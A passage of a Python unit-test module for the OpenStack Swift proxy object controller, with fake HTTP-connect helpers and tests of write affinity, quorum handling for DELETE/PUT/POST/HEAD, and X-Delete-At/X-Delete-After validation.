get_container_info as _real_get_container_info
from swift.common.storage_policy import POLICIES, ECDriverError, \
StoragePolicy, ECStoragePolicy
from test.unit import FakeRing, FakeMemcache, fake_http_connect, \
debug_logger, patch_policies, SlowBody, FakeStatus, \
DEFAULT_TEST_EC_TYPE, encode_frag_archive_bodies, make_ec_object_stub, \
fake_ec_node_response, StubResponse, mocked_http_conn
from test.unit.proxy.test_server import node_error_count
def unchunk_body(chunked_body):
body = ''
remaining = chunked_body
while remaining:
hex_length, remaining = remaining.split('\r\n', 1)
length = int(hex_length, 16)
body += remaining[:length]
remaining = remaining[length + 2:]
return body
@contextmanager
def set_http_connect(*args, **kwargs):
old_connect = swift.proxy.controllers.base.http_connect
new_connect = fake_http_connect(*args, **kwargs)
try:
swift.proxy.controllers.base.http_connect = new_connect
swift.proxy.controllers.obj.http_connect = new_connect
swift.proxy.controllers.account.http_connect = new_connect
swift.proxy.controllers.container.http_connect = new_connect
yield new_connect
left_over_status = list(new_connect.code_iter)
if left_over_status:
raise AssertionError('left over status %r' % left_over_status)
finally:
swift.proxy.controllers.base.http_connect = old_connect
swift.proxy.controllers.obj.http_connect = old_connect
swift.proxy.controllers.account.http_connect = old_connect
swift.proxy.controllers.container.http_connect = old_connect
class PatchedObjControllerApp(proxy_server.Application):
"""
This patch is just a hook over the proxy server's __call__ to ensure
that calls to get_container_info will return the stubbed value for
container_info if it's a container info call.
"""
container_info = {}
per_container_info = {}
def __call__(self, *args, **kwargs):
def _fake_get_container_info(env, app, swift_source=None):
_vrs, account, container, _junk = utils.split_path(
env['PATH_INFO'], 3, 4)
# Seed the cache with our container info so that the real
# get_container_info finds it.
ic = env.setdefault('swift.infocache', {})
cache_key = "container/%s/%s" % (account, container)
old_value = ic.get(cache_key)
# Copy the container info so we don't hand out a reference to a
# mutable thing that's set up only once at compile time. Nothing
# *should* mutate it, but it's better to be paranoid than wrong.
if container in self.per_container_info:
ic[cache_key] = self.per_container_info[container].copy()
else:
ic[cache_key] = self.container_info.copy()
real_info = _real_get_container_info(env, app, swift_source)
if old_value is None:
del ic[cache_key]
else:
ic[cache_key] = old_value
return real_info
with mock.patch('swift.proxy.server.get_container_info',
new=_fake_get_container_info), \
mock.patch('swift.proxy.controllers.base.get_container_info',
new=_fake_get_container_info):
return super(
PatchedObjControllerApp, self).__call__(*args, **kwargs)
def make_footers_callback(body=None):
# helper method to create a footers callback that will generate some fake
# footer metadata
cont_etag = 'container update etag may differ'
crypto_etag = '20242af0cd21dd7195a10483eb7472c9'
etag_crypto_meta = \
'{"cipher": "AES_CTR_256", "iv": "sD+PSw/DfqYwpsVGSo0GEw=="}'
etag = md5(body).hexdigest() if body is not None else None
footers_to_add = {
'X-Object-Sysmeta-Container-Update-Override-Etag': cont_etag,
'X-Object-Sysmeta-Crypto-Etag': crypto_etag,
'X-Object-Sysmeta-Crypto-Meta-Etag': etag_crypto_meta,
'X-I-Feel-Lucky': 'Not blocked',
'Etag': etag}
def footers_callback(footers):
footers.update(footers_to_add)
return footers_callback
class BaseObjectControllerMixin(object):
container_info = {
'status': 200,
'write_acl': None,
'read_acl': None,
'storage_policy': None,
'sync_key': None,
'versions': None,
}
# this needs to be set on the test case
controller_cls = None
def setUp(self):
# setup fake rings with handoffs
for policy in POLICIES:
policy.object_ring.max_more_nodes = policy.object_ring.replicas
self.logger = debug_logger('proxy-server')
self.logger.thread_locals = ('txn1', '127.0.0.2')
# increase connection timeout to avoid intermittent failures
conf = {'conn_timeout': 1.0}
self.app = PatchedObjControllerApp(
conf, FakeMemcache(), account_ring=FakeRing(),
container_ring=FakeRing(), logger=self.logger)
# you can over-ride the container_info just by setting it on the app
# (see PatchedObjControllerApp for details)
self.app.container_info = dict(self.container_info)
# default policy and ring references
self.policy = POLICIES.default
self.obj_ring = self.policy.object_ring
self._ts_iter = (utils.Timestamp(t) for t in
itertools.count(int(time.time())))
def ts(self):
return next(self._ts_iter)
def replicas(self, policy=None):
policy = policy or POLICIES.default
return policy.object_ring.replicas
def quorum(self, policy=None):
policy = policy or POLICIES.default
return policy.quorum
def test_iter_nodes_local_first_noops_when_no_affinity(self):
# this test needs a stable node order - most don't
self.app.sort_nodes = lambda l, *args, **kwargs: l
controller = self.controller_cls(
self.app, 'a', 'c', 'o')
policy = self.policy
self.app.get_policy_options(policy).write_affinity_is_local_fn = None
object_ring = policy.object_ring
all_nodes = object_ring.get_part_nodes(1)
all_nodes.extend(object_ring.get_more_nodes(1))
local_first_nodes = list(controller.iter_nodes_local_first(
object_ring, 1))
self.maxDiff = None
self.assertEqual(all_nodes, local_first_nodes)
def test_iter_nodes_local_first_moves_locals_first(self):
controller = self.controller_cls(
self.app, 'a', 'c', 'o')
policy_conf = self.app.get_policy_options(self.policy)
policy_conf.write_affinity_is_local_fn = (
lambda node: node['region'] == 1)
# we'll write to one more than replica count local nodes
policy_conf.write_affinity_node_count_fn = lambda r: r + 1
object_ring = self.policy.object_ring
# make our fake ring have plenty of nodes, and not get limited
# artificially by the proxy max request node count
object_ring.max_more_nodes = 100000
# nothing magic about * 2 + 3, just a way to make it bigger
self.app.request_node_count = lambda r: r * 2 + 3
all_nodes = object_ring.get_part_nodes(1)
all_nodes.extend(object_ring.get_more_nodes(1))
# limit to the number we're going to look at in this request
nodes_requested = self.app.request_node_count(object_ring.replicas)
all_nodes = all_nodes[:nodes_requested]
# make sure we have enough local nodes (sanity)
all_local_nodes = [n for n in all_nodes if
policy_conf.write_affinity_is_local_fn(n)]
self.assertGreaterEqual(len(all_local_nodes), self.replicas() + 1)
# finally, create the local_first_nodes iter and flatten it out
local_first_nodes = list(controller.iter_nodes_local_first(
object_ring, 1))
# the local nodes move up in the ordering
self.assertEqual([1] * (self.replicas() + 1), [
node['region'] for node in local_first_nodes[
:self.replicas() + 1]])
# we don't skip any nodes
self.assertEqual(len(all_nodes), len(local_first_nodes))
self.assertEqual(sorted(all_nodes), sorted(local_first_nodes))
def test_iter_nodes_local_first_best_effort(self):
controller = self.controller_cls(
self.app, 'a', 'c', 'o')
policy_conf = self.app.get_policy_options(self.policy)
policy_conf.write_affinity_is_local_fn = (
lambda node: node['region'] == 1)
object_ring = self.policy.object_ring
all_nodes = object_ring.get_part_nodes(1)
all_nodes.extend(object_ring.get_more_nodes(1))
local_first_nodes = list(controller.iter_nodes_local_first(
object_ring, 1))
# we won't have quite enough local nodes...
self.assertEqual(len(all_nodes), self.replicas() +
POLICIES.default.object_ring.max_more_nodes)
all_local_nodes = [n for n in all_nodes if
policy_conf.write_affinity_is_local_fn(n)]
self.assertEqual(len(all_local_nodes), self.replicas())
# but the local nodes we do have are at the front of the local iter
first_n_local_first_nodes = local_first_nodes[:len(all_local_nodes)]
self.assertEqual(sorted(all_local_nodes),
sorted(first_n_local_first_nodes))
# but we *still* don't *skip* any nodes
self.assertEqual(len(all_nodes), len(local_first_nodes))
self.assertEqual(sorted(all_nodes), sorted(local_first_nodes))
def test_iter_nodes_local_handoff_first_noops_when_no_affinity(self):
# this test needs a stable node order - most don't
self.app.sort_nodes = lambda l, *args, **kwargs: l
controller = self.controller_cls(
self.app, 'a', 'c', 'o')
policy = self.policy
self.app.get_policy_options(policy).write_affinity_is_local_fn = None
object_ring = policy.object_ring
all_nodes = object_ring.get_part_nodes(1)
all_nodes.extend(object_ring.get_more_nodes(1))
local_first_nodes = list(controller.iter_nodes_local_first(
object_ring, 1, local_handoffs_first=True))
self.maxDiff = None
self.assertEqual(all_nodes, local_first_nodes)
def test_iter_nodes_handoff_local_first_default(self):
controller = self.controller_cls(
self.app, 'a', 'c', 'o')
policy_conf = self.app.get_policy_options(self.policy)
policy_conf.write_affinity_is_local_fn = (
lambda node: node['region'] == 1)
object_ring = self.policy.object_ring
primary_nodes = object_ring.get_part_nodes(1)
handoff_nodes_iter = object_ring.get_more_nodes(1)
all_nodes = primary_nodes + list(handoff_nodes_iter)
handoff_nodes_iter = object_ring.get_more_nodes(1)
local_handoffs = [n for n in handoff_nodes_iter if
policy_conf.write_affinity_is_local_fn(n)]
prefered_nodes = list(controller.iter_nodes_local_first(
object_ring, 1, local_handoffs_first=True))
self.assertEqual(len(all_nodes), self.replicas() +
POLICIES.default.object_ring.max_more_nodes)
first_primary_nodes = prefered_nodes[:len(primary_nodes)]
self.assertEqual(sorted(primary_nodes), sorted(first_primary_nodes))
handoff_count = self.replicas() - len(primary_nodes)
first_handoffs = prefered_nodes[len(primary_nodes):][:handoff_count]
self.assertEqual(first_handoffs, local_handoffs[:handoff_count])
def test_iter_nodes_handoff_local_first_non_default(self):
# Obviously this test doesn't work if we're testing 1 replica.
# In that case, we don't have any failovers to check.
if self.replicas() == 1:
return
controller = self.controller_cls(
self.app, 'a', 'c', 'o')
policy_conf = self.app.get_policy_options(self.policy)
policy_conf.write_affinity_is_local_fn = (
lambda node: node['region'] == 1)
policy_conf.write_affinity_handoff_delete_count = 1
object_ring = self.policy.object_ring
primary_nodes = object_ring.get_part_nodes(1)
handoff_nodes_iter = object_ring.get_more_nodes(1)
all_nodes = primary_nodes + list(handoff_nodes_iter)
handoff_nodes_iter = object_ring.get_more_nodes(1)
local_handoffs = [n for n in handoff_nodes_iter if
policy_conf.write_affinity_is_local_fn(n)]
prefered_nodes = list(controller.iter_nodes_local_first(
object_ring, 1, local_handoffs_first=True))
self.assertEqual(len(all_nodes), self.replicas() +
POLICIES.default.object_ring.max_more_nodes)
first_primary_nodes = prefered_nodes[:len(primary_nodes)]
self.assertEqual(sorted(primary_nodes), sorted(first_primary_nodes))
handoff_count = policy_conf.write_affinity_handoff_delete_count
first_handoffs = prefered_nodes[len(primary_nodes):][:handoff_count]
self.assertEqual(first_handoffs, local_handoffs[:handoff_count])
def test_connect_put_node_timeout(self):
controller = self.controller_cls(
self.app, 'a', 'c', 'o')
req = swift.common.swob.Request.blank('/v1/a/c/o')
self.app.conn_timeout = 0.05
with set_http_connect(slow_connect=True):
nodes = [dict(ip='', port='', device='')]
res = controller._connect_put_node(nodes, '', req, {}, ('', ''))
self.assertIsNone(res)
def test_DELETE_simple(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='DELETE')
codes = [204] * self.replicas()
with set_http_connect(*codes):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 204)
def test_DELETE_missing_one(self):
# Obviously this test doesn't work if we're testing 1 replica.
# In that case, we don't have any failovers to check.
if self.replicas() == 1:
return
req = swift.common.swob.Request.blank('/v1/a/c/o', method='DELETE')
codes = [404] + [204] * (self.replicas() - 1)
random.shuffle(codes)
with set_http_connect(*codes):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 204)
def test_DELETE_not_found(self):
# Obviously this test doesn't work if we're testing 1 replica.
# In that case, we don't have any failovers to check.
if self.replicas() == 1:
return
req = swift.common.swob.Request.blank('/v1/a/c/o', method='DELETE')
codes = [404] * (self.replicas() - 1) + [204]
with set_http_connect(*codes):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 404)
def test_DELETE_mostly_found(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='DELETE')
mostly_204s = [204] * self.quorum()
codes = mostly_204s + [404] * (self.replicas() - len(mostly_204s))
self.assertEqual(len(codes), self.replicas())
with set_http_connect(*codes):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 204)
def test_DELETE_mostly_not_found(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='DELETE')
mostly_404s = [404] * self.quorum()
codes = mostly_404s + [204] * (self.replicas() - len(mostly_404s))
self.assertEqual(len(codes), self.replicas())
with set_http_connect(*codes):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 404)
def test_DELETE_half_not_found_statuses(self):
self.obj_ring.set_replicas(4)
req = swift.common.swob.Request.blank('/v1/a/c/o', method='DELETE')
with set_http_connect(404, 204, 404, 204):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 204)
def test_DELETE_half_not_found_headers_and_body(self):
# Transformed responses have bogus bodies and headers, so make sure we
# send the client headers and body from a real node's response.
self.obj_ring.set_replicas(4)
status_codes = (404, 404, 204, 204)
bodies = ('not found', 'not found', '', '')
headers = [{}, {}, {'Pick-Me': 'yes'}, {'Pick-Me': 'yes'}]
req = swift.common.swob.Request.blank('/v1/a/c/o', method='DELETE')
with set_http_connect(*status_codes, body_iter=bodies,
headers=headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 204)
self.assertEqual(resp.headers.get('Pick-Me'), 'yes')
self.assertEqual(resp.body, '')
def test_DELETE_handoff(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='DELETE')
codes = [204] * self.replicas()
with set_http_connect(507, *codes):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 204)
def test_DELETE_limits_expirer_queue_updates(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='DELETE')
codes = [204] * self.replicas()
captured_headers = []
def capture_headers(ip, port, device, part, method, path,
headers=None, **kwargs):
captured_headers.append(headers)
with set_http_connect(*codes, give_connect=capture_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 204) # sanity check
counts = {True: 0, False: 0, None: 0}
for headers in captured_headers:
v = headers.get('X-Backend-Clean-Expiring-Object-Queue')
norm_v = None if v is None else utils.config_true_value(v)
counts[norm_v] += 1
max_queue_updates = 2
o_replicas = self.replicas()
self.assertEqual(counts, {
True: min(max_queue_updates, o_replicas),
False: max(o_replicas - max_queue_updates, 0),
None: 0,
})
def test_expirer_DELETE_suppresses_expirer_queue_updates(self):
req = swift.common.swob.Request.blank(
'/v1/a/c/o', method='DELETE', headers={
'X-Backend-Clean-Expiring-Object-Queue': 'no'})
codes = [204] * self.replicas()
captured_headers = []
def capture_headers(ip, port, device, part, method, path,
headers=None, **kwargs):
captured_headers.append(headers)
with set_http_connect(*codes, give_connect=capture_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 204) # sanity check
counts = {True: 0, False: 0, None: 0}
for headers in captured_headers:
v = headers.get('X-Backend-Clean-Expiring-Object-Queue')
norm_v = None if v is None else utils.config_true_value(v)
counts[norm_v] += 1
o_replicas = self.replicas()
self.assertEqual(counts, {
True: 0,
False: o_replicas,
None: 0,
})
# Make sure we're not sending any expirer-queue update headers here.
# Since we're not updating the expirer queue, these headers would be
# superfluous.
for headers in captured_headers:
self.assertNotIn('X-Delete-At-Container', headers)
self.assertNotIn('X-Delete-At-Partition', headers)
self.assertNotIn('X-Delete-At-Host', headers)
self.assertNotIn('X-Delete-At-Device', headers)
def test_DELETE_write_affinity_before_replication(self):
policy_conf = self.app.get_policy_options(self.policy)
policy_conf.write_affinity_handoff_delete_count = self.replicas() / 2
policy_conf.write_affinity_is_local_fn = (
lambda node: node['region'] == 1)
handoff_count = policy_conf.write_affinity_handoff_delete_count
req = swift.common.swob.Request.blank('/v1/a/c/o', method='DELETE')
codes = [204] * self.replicas() + [404] * handoff_count
with set_http_connect(*codes):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 204)
def test_DELETE_write_affinity_after_replication(self):
policy_conf = self.app.get_policy_options(self.policy)
policy_conf.write_affinity_handoff_delete_count = self.replicas() / 2
policy_conf.write_affinity_is_local_fn = (
lambda node: node['region'] == 1)
handoff_count = policy_conf.write_affinity_handoff_delete_count
req = swift.common.swob.Request.blank('/v1/a/c/o', method='DELETE')
codes = ([204] * (self.replicas() - handoff_count) +
[404] * handoff_count +
[204] * handoff_count)
with set_http_connect(*codes):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 204)
def test_PUT_limits_expirer_queue_deletes(self):
req = swift.common.swob.Request.blank(
'/v1/a/c/o', method='PUT', body='',
headers={'Content-Type': 'application/octet-stream'})
codes = [201] * self.replicas()
captured_headers = []
def capture_headers(ip, port, device, part, method, path,
headers=None, **kwargs):
captured_headers.append(headers)
expect_headers = {
'X-Obj-Metadata-Footer': 'yes',
'X-Obj-Multiphase-Commit': 'yes'
}
with set_http_connect(*codes, give_connect=capture_headers,
expect_headers=expect_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201) # sanity check
counts = {True: 0, False: 0, None: 0}
for headers in captured_headers:
v = headers.get('X-Backend-Clean-Expiring-Object-Queue')
norm_v = None if v is None else utils.config_true_value(v)
counts[norm_v] += 1
max_queue_updates = 2
o_replicas = self.replicas()
self.assertEqual(counts, {
True: min(max_queue_updates, o_replicas),
False: max(o_replicas - max_queue_updates, 0),
None: 0,
})
def test_POST_limits_expirer_queue_deletes(self):
req = swift.common.swob.Request.blank(
'/v1/a/c/o', method='POST', body='',
headers={'Content-Type': 'application/octet-stream'})
codes = [201] * self.replicas()
captured_headers = []
def capture_headers(ip, port, device, part, method, path,
headers=None, **kwargs):
captured_headers.append(headers)
with set_http_connect(*codes, give_connect=capture_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 201) # sanity check
counts = {True: 0, False: 0, None: 0}
for headers in captured_headers:
v = headers.get('X-Backend-Clean-Expiring-Object-Queue')
norm_v = None if v is None else utils.config_true_value(v)
counts[norm_v] += 1
max_queue_updates = 2
o_replicas = self.replicas()
self.assertEqual(counts, {
True: min(max_queue_updates, o_replicas),
False: max(o_replicas - max_queue_updates, 0),
None: 0,
})
def test_POST_non_int_delete_after(self):
t = str(int(time.time() + 100)) + '.1'
req = swob.Request.blank('/v1/a/c/o', method='POST',
headers={'Content-Type': 'foo/bar',
'X-Delete-After': t})
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
self.assertEqual('Non-integer X-Delete-After', resp.body)
def test_PUT_non_int_delete_after(self):
t = str(int(time.time() + 100)) + '.1'
req = swob.Request.blank('/v1/a/c/o', method='PUT', body='',
headers={'Content-Type': 'foo/bar',
'X-Delete-After': t})
with set_http_connect():
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
self.assertEqual('Non-integer X-Delete-After', resp.body)
def test_POST_negative_delete_after(self):
req = swob.Request.blank('/v1/a/c/o', method='POST',
headers={'Content-Type': 'foo/bar',
'X-Delete-After': '-60'})
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
self.assertEqual('X-Delete-After in past', resp.body)
def test_PUT_negative_delete_after(self):
req = swob.Request.blank('/v1/a/c/o', method='PUT', body='',
headers={'Content-Type': 'foo/bar',
'X-Delete-After': '-60'})
with set_http_connect():
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
self.assertEqual('X-Delete-After in past', resp.body)
def test_POST_delete_at_non_integer(self):
t = str(int(time.time() + 100)) + '.1'
req = swob.Request.blank('/v1/a/c/o', method='POST',
headers={'Content-Type': 'foo/bar',
'X-Delete-At': t})
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
self.assertEqual('Non-integer X-Delete-At', resp.body)
def test_PUT_delete_at_non_integer(self):
t = str(int(time.time() - 100)) + '.1'
req = swob.Request.blank('/v1/a/c/o', method='PUT', body='',
headers={'Content-Type': 'foo/bar',
'X-Delete-At': t})
with set_http_connect():
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
self.assertEqual('Non-integer X-Delete-At', resp.body)
def test_POST_delete_at_in_past(self):
t = str(int(time.time() - 100))
req = swob.Request.blank('/v1/a/c/o', method='POST',
headers={'Content-Type': 'foo/bar',
'X-Delete-At': t})
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
self.assertEqual('X-Delete-At in past', resp.body)
def test_PUT_delete_at_in_past(self):
t = str(int(time.time() - 100))
req = swob.Request.blank('/v1/a/c/o', method='PUT', body='',
headers={'Content-Type': 'foo/bar',
'X-Delete-At': t})
with set_http_connect():
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 400)
self.assertEqual('X-Delete-At in past', resp.body)
def test_HEAD_simple(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='HEAD')
with set_http_connect(200):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertIn('Accept-Ranges', resp.headers)
def test_HEAD_x_newest(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='HEAD',
headers={'X-Newest': 'true'})
with set_http_connect(*([200] * self.replicas())):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
def test_HEAD_x_newest_different_timestamps(self):
req = swob.Request.blank('/v1/a/c/o', method='HEAD',
headers={'X-Newest': 'true'})
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
timestamps = [next(ts) for i in range(self.replicas())]
newest_timestamp = timestamps[-1]
random.shuffle(timestamps)
backend_response_headers = [{
'X-Backend-Timestamp': t.internal,
'X-Timestamp': t.normal
} for t in timestamps]
with set_http_connect(*([200] * self.replicas()),
headers=backend_response_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['x-timestamp'], newest_timestamp.normal)
def test_HEAD_x_newest_with_two_vector_timestamps(self):
req = swob.Request.blank('/v1/a/c/o', method='HEAD',
headers={'X-Newest': 'true'})
ts = (utils.Timestamp.now(offset=offset)
for offset in itertools.count())
timestamps = [next(ts) for i in range(self.replicas())]
newest_timestamp = timestamps[-1]
random.shuffle(timestamps)
backend_response_headers = [{
'X-Backend-Timestamp': t.internal,
'X-Timestamp': t.normal
} for t in timestamps]
with set_http_connect(*([200] * self.replicas()),
headers=backend_response_headers):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.headers['x-backend-timestamp'],
newest_timestamp.internal)
def test_HEAD_x_newest_with_some_missing(self):
req = swob.Request.blank('/v1/a/c/o', method='HEAD',
headers={'X-Newest': 'true'})
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
request_count = self.app.request_node_count(self.obj_ring.replicas)
backend_response_headers = [{
'x-timestamp': next(ts).normal,
} for i in range(request_count)]
responses = [404] * (request_count - 1)
responses.append(200)
request_log = []
def capture_requests(ip, port, device, part, method, path,
headers=None, **kwargs):
req = {
'ip': ip,
'port': port,
'device': device,
'part': part,
'method': method,
'path': path,
'headers': headers,
}
request_log.append(req)
with set_http_connect(*responses,
headers=backend_response_headers,
give_connect=capture_requests):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 200)
for req in request_log:
self.assertEqual(req['method'], 'HEAD')
self.assertEqual(req['path'], '/a/c/o')
def test_container_sync_delete(self):
ts = (utils.Timestamp(t) for t in itertools.count(int(time.time())))
test_indexes = [None] + [int(p) for p in POLICIES]
for policy_index in test_indexes:
req = swob.Request.blank(
'/v1/a/c/o', method='DELETE', headers={
'X-Timestamp': next(ts).internal})
codes = [409] * self.obj_ring.replicas
ts_iter = itertools.repeat(next(ts).internal)
with set_http_connect(*codes, timestamps=ts_iter):
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 409)
def test_PUT_requires_length(self):
req = swift.common.swob.Request.blank('/v1/a/c/o', method='PUT')
resp = req.get_response(self.app)
self.assertEqual(resp.status_int, 411)
def test_container_update_backend_requests(self):
for policy in POLICIES:
req = swift.common.swob.Request.blank(
'/v1/a/c/o', method='PUT',
headers={'Content-Length': '0',
'X-Backend-Storage-Policy-Index': int(policy)})
controller = self.controller_cls(self.app, 'a', 'c', 'o')
# This is the number of container updates we're doing, simulating
# 1 to 15 container replicas.
for num_containers in range(1, 16):
containers = [{'ip': '1.0.0.%s' % i,
'port': '60%s' % str(i).zfill(2),
'device': 'sdb'} for i in range(num_containers)]
backend_headers = controller._backend_requests(
req, self.replicas(policy), 1, containers)
# how many of the backend headers have a container update
n_container_updates = len(
[headers for headers in backend_headers
if 'X-Container-Partition' in headers])
# how many object-server PUTs can fail and still let the
# client PUT succeed
n_can_fail = self.replicas(policy) - self.quorum(policy)
n_expected_updates = (
n_can_fail + utils.quorum_size(num_containers))
# you get at least one update per container no matter what
n_expected_updates = max(
n_expected_updates, num_containers)
# you can't have more object requests with updates than you
# have object requests (the container stuff gets doubled up,
# but that's not important for purposes of durability)
n_expected_updates = min(
n_expected_updates, self.replicas(policy))
self.assertEqual(n_expected_updates, n_container_updates)
def test_delete_at_backend_requests(self):
t = str(int(time.time() + 100))
for policy in POLICIES:
req = swift.common.swob.Request.blank(
'/v1/a/c/o', method='PUT',
headers={'Content-Length': '0',
'X-Backend-Storage-Policy-Index': int(policy),
'X-Delete-At': t})
controller = self.controller_cls(self.app, 'a', 'c', 'o')
for num_del_at_nodes in range(1, 16):
containers = [
{'ip': '2.0.0.%s' % i, 'port': '70%s' % str(i).zfill(2),
'device': 'sdc'} for i in range(num_del_at_nodes)]
del_at_nodes = [
{'ip': '1.0.0.%s' % i, 'port': '60%s' % str(i).zfill(2),
'device': 'sdb'} for i in range(num_del_at_nodes)]
backend_headers = controller._backend_requests(
req, self.replicas(policy), 1, containers,
delete_at_container='dac', delete_at_partition=2,
delete_at_nodes=del_at_nodes)
devices = []
hosts = []
part = ctr = 0
for given_headers in backend_headers:
self.assertEqual(given_headers.get('X-Delete-At'), t)
if 'X-Delete-At-Partition' in given_headers:
self.assertEqual(
given_headers.get('X-Delete-At-Partition'), '2')
part += 1
if 'X-Delete-At-Container' in given_headers:
self.assertEqual(
given_headers.get('X-Delete-At-Container'), 'dac')
ctr += 1
devices += (
list_from_csv(given_headers.get('X-Delete-At-Device')))
hosts += (
list_from_csv(given_headers.get('X-Delete-At-Host')))
# same as in test_container_update_backend_requests
n_can_fail = self.replicas(policy) - self.quorum(policy)
n_expected_updates = (
n_can_fail + utils.quorum_size(num_del_at_nodes))
n_expected_hosts = max(
n_expected_updates, num_del_at_nodes)
self.assertEqual(len(hosts), n_expected_hosts)
self.assertEqual(len(devices), n_expected_hosts)
# parts don't get doubled up, maximum is count of obj requests
n_expected_parts = min(
n_expected_hosts, self.replicas(policy))
self.assertEqual(part, n_expected_parts)
self.assertEqual(ctr, n_expected_parts)
# check that hosts are correct
self.assertEqual(
set(hosts),
set('%s:%s' % (h['ip'], h['port']) for h in del_at_nodes))
self.assertEqual(set(devices), set(('sdb',)))
def test_smooth_distributed_backend_requests(self):
t = str(int(time.time() + 100))
for policy in POLICIES:
req = swift.common.swob.Request.blank(
'/v1/a/c/o', method='PUT',
headers={'Content-Length': '0',
'X-Backend-Storage-Policy-Index': int(policy),
'X-Delete-At': t})
controller = self.controller_cls(self.app, 'a', 'c', 'o')
for num_containers in range(1, 16):
containers = [
{'ip': '2.0.0.%s' % i, 'port': '70%s' % str(i).zfill(2),
'device': 'sdc'} for i in range(num_containers)]
del_at_nodes = [
{'ip': '1.0.0.%s' % i, 'port': '60%s' % str(i).zfill(2),
'device': 'sdb'} for i in range(num_containers)]
backend_headers = controller._backend_requests(
req, self.replicas(policy), 1, containers,
delete_at_container='dac', delete_at_partition=2,
delete_at_nodes=del_at_nodes)
# caculate no of expected updates, see
# test_container_update_backend_requests for explanation
n_expected_updates = min(max(
self.replicas(policy) - self.quorum(policy) +
utils.quorum_size(num_containers), num_containers),
self.replicas(policy))
# the first n_expected_updates servers should have received
# a container update
self.assertTrue(
all([h.get('X-Container-Partition')
for h in backend_headers[:n_expected_updates]]))
# the last n_expected_updates servers should have received
# the x-delete-at* headers
self.assertTrue(
all([h.get('X-Delete-At-Container')
for h in backend_headers[-n_expected_updates:]]))
def _check_write_affinity(
self, conf, policy_conf, policy, affinity_regions, affinity_count):
conf['policy_config'] = policy_conf
app = PatchedObjControllerApp(
conf, FakeMemcache(), account_ring=FakeRing(),
container_ring=FakeRing(), logger=self.logger)
controller = self.controller_cls(app, 'a', 'c', 'o')
object_ring = app.get_object_ring(int(policy))
# make our fake ring have plenty of nodes, and not get limited
# artificially by the proxy max request node count
object_ring.max_more_nodes = 100
all_nodes = object_ring.get_part_nodes(1)
all_nodes.extend(object_ring.get_more_nodes(1))
# make sure we have enough local nodes (sanity)
all_local_nodes = [n for n in all_nodes if
n['region'] in affinity_regions]
self.assertGreaterEqual(len(all_local_nodes), affinity_count)
# finally, create the local_first_nodes iter and flatten it out
local_first_nodes = list(controller.iter_nodes_local_first(
object_ring, 1, policy))
# check that the required number of local nodes were moved up the order
node_regions = [node['region'] for node in local_first_nodes]
self.assertTrue(
all(r in affinity_regions for r in node_regions[:affinity_count]),
'Unexpected region found in local nodes, expected %s but got %s' %
(affinity_regions, node_regions))
return app
def test_write_affinity_not_configured(self):
# default is no write affinity so expect both regions 0 and 1
self._check_write_affinity({}, {}, POLICIES[0], [0, 1],
2 * self.replicas(POLICIES[0]))
self._check_write_affinity({}, {}, POLICIES[1], [0, 1],
2 * self.replicas(POLICIES[1]))
def test_write_affinity_proxy_server_config(self):
# without overrides policies use proxy-server config section options
conf = {'write_affinity_node_count': '1 * replicas',
'write_affinity': 'r0'}
self._check_write_affinity(conf, {}, POLICIES[0], [0],
self.replicas(POLICIES[0]))
self._check_write_affinity(conf, {}, POLICIES[1], [0],
self.replicas(POLICIES[1]))
def test_write_affinity_per_policy_config(self):
# check only per-policy configuration is sufficient
conf = {}
policy_conf = {'0': {'write_affinity_node_count': '1 * replicas',
'write_affinity': 'r1'},
'1': {'write_affinity_node_count': '5',
'write_affinity': 'r0'}}
self._check_write_affinity(conf, policy_conf, POLICIES[0], [1],
self.replicas(POLICIES[0]))
self._check_write_affinity(conf, policy_conf, POLICIES[1], [0], 5)
def test_write_affinity_per_policy_config_overrides_and_inherits(self):
# check per-policy config is preferred over proxy-server section config
conf = {'write_affinity_node_count': '1 * replicas',
'write_affinity': 'r0'}
policy_conf = {'0': {'write_affinity': 'r1'},
'1': {'write_affinity_node_count': '3 * replicas'}}
# policy 0 inherits default node count, override affinity to r1
self._check_write_affinity(conf, policy_conf, POLICIES[0], [1],
self.replicas(POLICIES[0]))
# policy 1 inherits default affinity to r0, overrides node count
self._check_write_affinity(conf, policy_conf, POLICIES[1], [0],
3 * self.replicas(POLICIES[1]))
# end of BaseObjectControllerMixin
@patch_policies()
